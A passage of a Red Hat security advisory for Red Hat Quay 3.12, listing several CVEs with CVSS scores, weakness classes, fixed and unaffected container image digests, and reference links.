Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64	—	Workaround

Threats

Impact Moderate

CVE-2026-42039

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix

Known not affected 24 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64		—

Threats

Impact Important

CVE-2026-42041

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix

Known not affected 24 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64		—

Threats

Impact Important

CVE-2026-42043

7.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

CWE-918 - Server-Side Request Forgery (SSRF)

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix

Known not affected 24 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64		—

Threats

Impact Important

CVE-2026-42044

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix Workaround

Known not affected 24 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64	—	Workaround

Threats

Impact Important

References

121 references

URL	Category
https://access.redhat.com/errata/RHSA-2026:22629	self
https://access.redhat.com/security/cve/CVE-2025-62718	external
https://access.redhat.com/security/cve/CVE-2026-2377	external
https://access.redhat.com/security/cve/CVE-2026-32281	external
https://access.redhat.com/security/cve/CVE-2026-32282	external
https://access.redhat.com/security/cve/CVE-2026-32589	external
https://access.redhat.com/security/cve/CVE-2026-32590	external
https://access.redhat.com/security/cve/CVE-2026-33894	external
https://access.redhat.com/security/cve/CVE-2026-34986	external
https://access.redhat.com/security/cve/CVE-2026-39892	external
https://access.redhat.com/security/cve/CVE-2026-40192	external
https://access.redhat.com/security/cve/CVE-2026-40895	external
https://access.redhat.com/security/cve/CVE-2026-42033	external
https://access.redhat.com/security/cve/CVE-2026-42035	external
https://access.redhat.com/security/cve/CVE-2026-42039	external
https://access.redhat.com/security/cve/CVE-2026-42041	external
https://access.redhat.com/security/cve/CVE-2026-42043	external
https://access.redhat.com/security/cve/CVE-2026-42044	external
https://access.redhat.com/security/updates/classi…	external
https://security.access.redhat.com/data/csaf/v2/a…	self
https://access.redhat.com/security/cve/CVE-2025-62718	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456913	external
https://www.cve.org/CVERecord?id=CVE-2025-62718	external
https://nvd.nist.gov/vuln/detail/CVE-2025-62718	external
https://datatracker.ietf.org/doc/html/rfc1034#sec…	external
https://datatracker.ietf.org/doc/html/rfc3986#sec…	external
https://github.com/axios/axios/commit/fb3befb6daa…	external
https://github.com/axios/axios/pull/10661	external
https://github.com/axios/axios/releases/tag/v1.15.0	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-2377	self
https://bugzilla.redhat.com/show_bug.cgi?id=2439201	external
https://www.cve.org/CVERecord?id=CVE-2026-2377	external
https://nvd.nist.gov/vuln/detail/CVE-2026-2377	external
https://access.redhat.com/security/cve/CVE-2026-32281	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456333	external
https://www.cve.org/CVERecord?id=CVE-2026-32281	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32281	external
https://go.dev/cl/758061	external
https://go.dev/issue/78281	external
https://groups.google.com/g/golang-announce/c/0uY…	external
https://pkg.go.dev/vuln/GO-2026-4946	external
https://access.redhat.com/security/cve/CVE-2026-32282	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456336	external
https://www.cve.org/CVERecord?id=CVE-2026-32282	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32282	external
https://go.dev/cl/763761	external
https://go.dev/issue/78293	external
https://pkg.go.dev/vuln/GO-2026-4864	external
https://access.redhat.com/security/cve/CVE-2026-32589	self
https://bugzilla.redhat.com/show_bug.cgi?id=2446963	external
https://www.cve.org/CVERecord?id=CVE-2026-32589	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32589	external
https://access.redhat.com/security/cve/CVE-2026-32590	self
https://bugzilla.redhat.com/show_bug.cgi?id=2446964	external
https://www.cve.org/CVERecord?id=CVE-2026-32590	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32590	external
https://access.redhat.com/security/cve/CVE-2026-33894	self
https://bugzilla.redhat.com/show_bug.cgi?id=2452464	external
https://www.cve.org/CVERecord?id=CVE-2026-33894	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33894	external
https://datatracker.ietf.org/doc/html/rfc2313#section-8	external
https://github.com/digitalbazaar/forge/security/a…	external
https://mailarchive.ietf.org/arch/msg/openpgp/5rn…	external
https://www.rfc-editor.org/rfc/rfc8017.html	external
https://access.redhat.com/security/cve/CVE-2026-34986	self
https://bugzilla.redhat.com/show_bug.cgi?id=2455470	external
https://www.cve.org/CVERecord?id=CVE-2026-34986	external
https://nvd.nist.gov/vuln/detail/CVE-2026-34986	external
https://github.com/go-jose/go-jose/security/advis…	external
https://pkg.go.dev/github.com/go-jose/go-jose/v4#…	external
https://access.redhat.com/security/cve/CVE-2026-39892	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456735	external
https://www.cve.org/CVERecord?id=CVE-2026-39892	external
https://nvd.nist.gov/vuln/detail/CVE-2026-39892	external
http://www.openwall.com/lists/oss-security/2026/0…	external
https://github.com/pyca/cryptography/commit/622d6…	external
https://github.com/pyca/cryptography/security/adv…	external
https://access.redhat.com/security/cve/CVE-2026-40192	self
https://bugzilla.redhat.com/show_bug.cgi?id=2458856	external
https://www.cve.org/CVERecord?id=CVE-2026-40192	external
https://nvd.nist.gov/vuln/detail/CVE-2026-40192	external
https://github.com/python-pillow/Pillow/commit/3c…	external
https://github.com/python-pillow/Pillow/pull/9521	external
https://github.com/python-pillow/Pillow/security/…	external
https://pillow.readthedocs.io/en/stable/releaseno…	external
https://access.redhat.com/security/cve/CVE-2026-40895	self
https://bugzilla.redhat.com/show_bug.cgi?id=2460297	external
https://www.cve.org/CVERecord?id=CVE-2026-40895	external
https://nvd.nist.gov/vuln/detail/CVE-2026-40895	external
https://github.com/follow-redirects/follow-redire…	external
https://access.redhat.com/security/cve/CVE-2026-42033	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461607	external
https://www.cve.org/CVERecord?id=CVE-2026-42033	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42033	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42035	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461606	external
